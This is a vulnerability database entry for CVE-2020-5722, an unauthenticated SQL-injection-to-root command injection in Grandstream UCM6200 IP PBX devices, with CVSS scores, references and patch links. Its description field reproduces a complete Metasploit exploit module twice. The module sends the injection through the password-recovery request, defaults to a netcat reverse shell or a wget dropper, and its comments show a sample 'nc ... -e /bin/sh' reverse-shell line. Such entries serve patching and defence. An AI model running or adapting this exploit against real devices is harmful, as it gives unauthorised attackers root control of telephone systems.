Search

Find a vulnerability

Search criteria

    5 vulnerabilities found for ucm6200 by grandstream

    VAR-202003-1435

    Vulnerability from variot - Updated: 2025-11-18 15:19

    The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

    Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

    prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager

    def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices.

          Exploitation happens in two stages:
    
          1. An SQL injection during username lookup while executing the "Forgot Password" function. 
          2. A command injection that occurs after the user provided username is passed to a Python script
          via the shell. Like so:
    
          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
    
          This module affect UCM62xx versions before firmware version 1.0.19.20. 
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-5722' ],
          [ 'EDB', '48247']
        ],
        'DisclosureDate' => '2020-03-23',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'DisableNops' => true,
                'BadChars' => '\'&|'
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'wget' ]
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 8089,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
    

    end

    ## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } })

    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
    
    body_json = res.get_json_document
    return CheckCode::Unknown('No JSON in response') unless body_json
    
    prog_version = body_json.dig('response', 'prog_version')
    return false if prog_version.nil?
    
    vprint_status("The reported version is: #{prog_version}")
    
    version = Rex::Version.new(prog_version)
    if version < Rex::Version.new('1.0.19.20')
      return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
    end
    
    return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
    

    end

    ## # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection # and then it will get passed to a python script via sh which allows us to execute a command injection. # It will look something like this: # # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ # password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0 # # This functionality is related to the"Forgot Password" feature. This function is rate limited by # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few # payloads are appropriate. ### def execute_command(cmd, _opts = {}) rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', 'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};" } }, 5)

    # the netcat reverse shell payload holds the connection open. So we'll treat no response
    # as a success. The meterpreter payload does not hold the connection open so this clause digs
    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
    # generates an error (e.g. rate limit error)
    if res
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200
    
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    
      status_json = body_json['status']
      fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
      fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
    end
    
    print_good('Exploit successfully executed.')
    

    end

    def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "grandstream",
            "version": "1.0.19.20"
          },
          {
            "model": "ucm6200",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.19.20"
          },
          {
            "model": "ucm6200",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.17"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.17"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6200_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5722",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5722",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003190",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-23201",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5722",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003190",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5722",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2020-5722",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003190",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-23201",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1337",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5722",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  prepend Msf::Exploit::Remote::AutoCheck\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n          a command injection vulnerability (technically, no assigned CVE but was inadvertently\n          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n          series of devices. \n\n          Exploitation happens in two stages:\n\n          1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n          2. A command injection that occurs after the user provided username is passed to a Python script\n          via the shell. Like so:\n\n          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n          password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n          This module affect UCM62xx versions before firmware version 1.0.19.20. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e [\n          \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e [\n          [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n          [ \u0027EDB\u0027, \u002748247\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027DisableNops\u0027 =\u003e true,\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 1,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 8089,\n          \u0027SSL\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n        }\n      )\n    )\n    register_options([\n      OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n    ])\n  end\n\n  ##\n  # Sends a POST /cgi request with a payload of action=getInfo. The\n  # server should respond with a large json blob like the following,\n  # where \"prog_version\" is he firmware version:\n  #\n  # {\"response\"=\u003e{\n  #   \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n  #   \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n  #   \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.\",\n  #    \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n  #    \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n  #    \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n  #    \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n  ###\n  def check\n    normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n    vprint_status(\"Requesting version information from #{normalized_uri}\")\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalized_uri,\n      \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n    })\n\n    return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n    body_json = res.get_json_document\n    return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n    prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n    return false if prog_version.nil?\n\n    vprint_status(\"The reported version is: #{prog_version}\")\n\n    version = Rex::Version.new(prog_version)\n    if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n      return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n    end\n\n    return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n  end\n\n  ##\n  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n  # and then it will get passed to a python script via sh which allows us to execute a command injection. \n  # It will look something like this:\n  #\n  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n  #     password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n  #\n  # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n  # payloads are appropriate. \n  ###\n  def execute_command(cmd, _opts = {})\n    rand_num = Rex::Text.rand_text_numeric(1..5)\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n      \u0027vars_post\u0027 =\u003e\n      {\n        \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n        \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n      }\n    }, 5)\n\n    # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n    # as a success. The meterpreter payload does not hold the connection open so this clause digs\n    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n    # generates an error (e.g. rate limit error)\n    if res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n      body_json = res.get_json_document\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n      status_json = body_json[\u0027status\u0027]\n      fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n      fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager\n    end\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5722",
            "trust": 3.2
          },
          {
            "db": "PACKETSTORM",
            "id": "156876",
            "trust": 3.1
          },
          {
            "db": "PACKETSTORM",
            "id": "165708",
            "trust": 1.8
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-15",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190",
            "trust": 0.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "48247",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "id": "VAR-202003-1435",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          }
        ]
      },
      "last_update_date": "2025-11-18T15:19:46.068000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/214293"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112779"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.7,
            "url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
          },
          {
            "trust": 2.3,
            "url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.tenable.com/security/research/tra-2020-15"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-5722"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
          },
          {
            "trust": 0.7,
            "url": "https://www.exploit-db.com/exploits/48247"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/89.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
          },
          {
            "trust": 0.1,
            "url": "http://www.grandstream.com/\","
